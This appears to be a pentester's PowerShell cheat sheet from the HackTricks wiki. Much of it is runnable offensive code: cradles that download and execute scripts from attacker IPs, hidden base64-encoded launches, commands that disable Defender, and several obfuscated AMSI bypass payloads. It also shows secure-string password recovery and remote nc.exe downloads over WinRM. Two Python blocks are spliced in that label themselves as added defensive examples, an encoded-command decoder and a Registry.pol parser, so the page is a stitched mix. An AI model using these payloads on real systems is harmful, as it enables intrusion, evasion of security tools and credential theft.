# PowerShell Basics for Pentesters

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

## Default PowerShell locations
```powershell
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```

## Basic PS commands to start

```powershell
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full help about a topic
Get-Help Get-Item -Examples #List examples
Import-Module <modulepath>
Get-Command -Module <modulename>
```

## Download & Execute

```powershell
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1"); $r = $wr.GetResponse(); IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
```

### Download & Execute in background with AMSI Bypass

```powershell
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc <BASE64_ENCODED_PAYLOAD>"
```

### Using b64 from Linux

```powershell
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
```

## Download

### System.Net.WebClient

```powershell
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
```

### Invoke-WebRequest

```powershell
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
```

### Wget

```powershell
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
```

### BitsTransfer

```powershell
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```

## Base64 Kali & EncodedCommand

```powershell
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>
```
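Both encoding recipes on this page (the `echo -n ... | iconv -t UTF-16LE | base64` pipeline under "Using b64 from Linux" and the Kali one just above) leave an opaque `-enc` argument in the process-creation event a defender later reads. The Python below is an added example, not code from the page: it reverses that step over constructed log lines and reports which of the page's download-cradle keywords (`IEX`, `DownloadString`, `Net.WebClient`) the decoded script contains. It assumes powershell.exe accepts any prefix of `-EncodedCommand` plus the `-e` and `-ec` forms.

```python
"""Decode PowerShell -EncodedCommand arguments found in process command lines.

Added example, not from the original page. The log lines are constructed; the
helper _enc() reproduces the page's `echo -n ... | iconv -t UTF-16LE | base64`
pipeline so the sample matches what an operator would really have typed.
"""
import base64
import re

# powershell.exe matches switches by prefix: -e, -en, -enc, ..., -EncodedCommand
# all select EncodedCommand, and -ec is an alias (assumption about the exact set;
# the page itself uses -enc and -EncodedCommand).
_SWITCH_NAMES = ["e", "ec"] + ["encodedcommand"[:n] for n in range(2, 15)]
_ENC_SWITCH = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(sorted(_SWITCH_NAMES, key=len, reverse=True))
    + r")\s+(\S+)",
    re.IGNORECASE,
)

# Keywords from the page's download cradles; matched as whole words, case-insensitive.
CRADLE_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "iwr", "frombase64string",
)


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None when the line has
    no such switch or its argument is not base64-wrapped UTF-16LE."""
    m = _ENC_SWITCH.search(cmdline)
    if not m:
        return None
    b64 = m.group(1).strip("'\"")
    b64 += "=" * (-len(b64) % 4)  # restore padding a logger may have stripped
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def cradle_indicators(script: str):
    """List which download-cradle keywords occur in the decoded script."""
    low = script.lower()
    return [k for k in CRADLE_INDICATORS
            if re.search(r"\b" + re.escape(k) + r"\b", low)]


def triage(lines):
    """Return (line_no, decoded_script, indicators) for every line that carries
    a decodable encoded command."""
    findings = []
    for n, line in enumerate(lines, 1):
        script = decode_encoded_command(line)
        if script is not None:
            findings.append((n, script, cradle_indicators(script)))
    return findings


def _enc(ps: str) -> str:
    """Same transform as the page's `iconv -t UTF-16LE | base64 -w 0` pipeline."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample: one cradle, one harmless encoded command, one plain
# invocation and one line whose argument is not base64 at all.
CRADLE = "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')"
BENIGN = "Get-Date"
SAMPLE_LOG = [
    "CommandLine: powershell -nop -enc " + _enc(CRADLE),
    "CommandLine: powershell.exe -NoProfile -EncodedCommand " + _enc(BENIGN) + " -NonInteractive",
    "CommandLine: powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "CommandLine: powershell -e not_base64!!",
]

if __name__ == "__main__":
    for line_no, script, hits in triage(SAMPLE_LOG):
        print(f"line {line_no}: {script!r} indicators={hits}")
```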

## [Execution Policy](../authentication-credentials-uac-and-efs.md#ps-execution-policy)

## [Constrained Language](broken-reference/)

## [AppLocker Policy](broken-reference/)

## Enable WinRM (PS Remoting)

```powershell
enable-psremoting -force #This enables winrm
# Change NetWorkConnection Category to Private
#Requires -RunasAdministrator
Get-NetConnectionProfile |
Where{ $_.NetworkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}
```

## Disable Defender

{% code overflow="wrap" %}
```powershell
# Check status
Get-MpComputerStatus
Get-MpPreference | select Exclusion* | fl #Check exclusions
# Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
Set-MpPreference -ExclusionPath (pwd) -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath (pwd)
# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
```
{% endcode %}
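The `Parse-PolFile` output above shows exclusions arriving through Group Policy. The Python below is an added example, not code from the page or from any tool it names: it reads the same `Registry.pol` format directly (`PReg` header, then `[key;value;type;size;data]` records in UTF-16LE) and groups the Defender exclusions it finds by category. `SAMPLE_POL` is constructed to reproduce the two entries shown above plus one process exclusion.

```python
"""Parse a Group Policy Registry.pol file and list the Defender exclusions it pushes.

Added example, not from the original page: a from-scratch reader of the documented
PReg format. SAMPLE_POL is constructed to mirror the page's Parse-PolFile output.
"""
import struct

REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}


def _U(s: str) -> bytes:
    """Brackets, separators, keys and values in a .pol file are all UTF-16LE."""
    return s.encode("utf-16-le")


def _read_utf16z(buf: bytes, pos: int):
    """Read a null-terminated UTF-16LE string; return (text, position after the terminator)."""
    end = pos
    while True:
        if end + 2 > len(buf):
            raise ValueError(f"unterminated string at offset {pos}")
        if buf[end:end + 2] == b"\x00\x00":
            return buf[pos:end].decode("utf-16-le"), end + 2
        end += 2


def _expect(buf: bytes, pos: int, token: bytes) -> int:
    if buf[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + len(token)


def _decode_data(vtype: int, data: bytes):
    if vtype == 4 and len(data) == 4:
        return struct.unpack("<I", data)[0]
    if vtype in (1, 2):
        return data.decode("utf-16-le").rstrip("\x00")
    if vtype == 7:
        return [s for s in data.decode("utf-16-le").split("\x00") if s]
    return data.hex()  # REG_BINARY and anything unknown


def parse_pol(buf: bytes):
    """Return a list of {key, value, type, data} dicts, one per record in the file."""
    if buf[:4] != b"PReg":
        raise ValueError("missing PReg signature: not a Registry.pol file")
    version = struct.unpack_from("<I", buf, 4)[0]
    if version != 1:
        raise ValueError(f"unsupported Registry.pol version {version}")
    pos, entries = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, _U("["))
        key, pos = _read_utf16z(buf, pos)
        pos = _expect(buf, pos, _U(";"))
        value, pos = _read_utf16z(buf, pos)
        pos = _expect(buf, pos, _U(";"))
        vtype = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, _U(";"))
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, _U(";"))
        data = buf[pos:pos + size]
        if len(data) != size:
            raise ValueError(f"truncated data for {key}\\{value}")
        pos = _expect(buf, pos + size, _U("]"))
        entries.append({"key": key, "value": value,
                        "type": REG_TYPES.get(vtype, f"0x{vtype:x}"),
                        "data": _decode_data(vtype, data)})
    return entries


EXCLUSION_ROOT = "software\\policies\\microsoft\\windows defender\\exclusions\\"


def defender_exclusions(entries):
    """Group the excluded Paths/Processes/Extensions pushed by the policy, by category."""
    out = {}
    for e in entries:
        if e["key"].lower().startswith(EXCLUSION_ROOT):
            category = e["key"].rsplit("\\", 1)[-1]
            out.setdefault(category, []).append(e["value"])
    return out


def _entry(key: str, value: str, vtype: int, data: bytes) -> bytes:
    """Serialise one [key;value;type;size;data] record (used only to build the sample)."""
    return (_U("[") + _U(key) + b"\x00\x00" + _U(";") + _U(value) + b"\x00\x00" + _U(";")
            + struct.pack("<I", vtype) + _U(";") + struct.pack("<I", len(data)) + _U(";")
            + data + _U("]"))


# Constructed sample mirroring the page's Parse-PolFile output, plus one process exclusion.
_WD = "Software\\Policies\\Microsoft\\Windows Defender\\Exclusions"
SAMPLE_POL = (
    b"PReg" + struct.pack("<I", 1)
    + _entry(_WD, "Exclusions_Paths", 4, struct.pack("<I", 1))
    + _entry(_WD + "\\Paths", "C:\\Windows\\Temp", 1, _U("0") + b"\x00\x00")
    + _entry(_WD + "\\Processes", "backup_agent.exe", 1, _U("0") + b"\x00\x00")
)

if __name__ == "__main__":
    for cat, names in defender_exclusions(parse_pol(SAMPLE_POL)).items():
        print(f"{cat}: {', '.join(names)}")
```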

### AMSI Bypass

**`amsi.dll`** is **loaded** into your process and has the **exports** needed for any application to interact with it. And because it is loaded in the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**, making it detect nothing.

Therefore, the goal of the AMSI bypasses you will see is to **overwrite the instructions of that DLL in memory to make the detection useless**.

**AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)

```powershell
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
& ( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)
# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)
# AMSI Bypass in python
https://fluidattacks.com/blog/amsi-bypass-python/
# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass
# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html
```

### AMSI Bypass 2 - Managed API Call Hooking

Check [**this post for detailed information**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/) [**and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/).

This new technique relies on API call hooking of .NET methods. As it turns out, .NET methods need to be compiled to native machine instructions in memory, which end up looking very similar to native methods. These compiled methods can be hooked to change the control flow of a program.

The steps to perform API call hooking of .NET methods are:

1. Identify the target method to hook
2. Define a method with the same function prototype as the target
3. Use reflection to find the methods
4. Ensure each method has been compiled
5. Find the location of each method in memory
6. Overwrite the target method with instructions pointing to our malicious method

### AMSI Bypass 3 - SeDebug Privilege

[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) you can see how, with enough privileges to debug processes, it is possible to spawn a powershell.exe process, debug it, monitor when it loads `amsi.dll` and disable it.

### AMSI Bypass - More Resources

+ [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
+ [Amsi Bypass on Windows 11 in 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)

## PS-History

```powershell
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```

## Find newer files

Options: `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`

```powershell
# LastAccessTime:
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
# LastWriteTime:
(gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
```

## Get permissions

```powershell
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
```

## OS version and HotFixes

```powershell
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
```

## Environment

```powershell
Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName #Get UserName value
```

## Other connected drives

```powershell
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```

### Recycle Bin

```powershell
$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
```

## Domain Recon

{% content-ref url="powerview.md" %}
[powerview.md](powerview.md)
{% endcontent-ref %}

## Users

```powershell
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```

## Secure String to Plaintext

```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```

Or parsing directly from XML:

```powershell
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```

## SUDO
```powershell
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

#For local:
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"

#For WINRM
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred

Start-Process powershell -Credential $cred -ArgumentList '-noprofile -command & {Start-Process C:\xyz\nc.bat -verb Runas}'

#Another method
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
```

## Groups

```powershell
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
```

## Clipboard

```powershell
Get-Clipboard
```

## Processes

```powershell
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```

## Services

```powershell
Get-Service
```

## Password from secure string

```powershell
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password
```

## Scheduled Tasks

```powershell
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```

## Network

### Port Scan

```powershell
# Check Port or Single IP
Test-NetConnection -Port 80 10.10.10.10

# Check Port List in Single IP
80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null

# Check Port Range in single IP
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null

# Check Port List in IP Lists - 80,443,445,8080
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
```

### Interfaces

```powershell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```

### Firewall

```powershell
Get-NetFirewallRule -Enabled True
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow

# Open SSH to the world
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow

# Get name, proto, local and remote ports, remote address, enabled, profile and direction
## You can use the following line changing the initial filters to indicate a different direction or action
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
```

### Route

```powershell
route print
```

### ARP

```powershell
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```

### Hosts

```powershell
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```

### Ping

```powershell
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
```

### SNMP

```powershell
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```

## **Converting SDDL String into a Readable Format**

```powershell
PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-008
0c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb9
6050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e5350144
Owner : BUILTIN\Administrators
Group : BUILTIN\Administrators
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
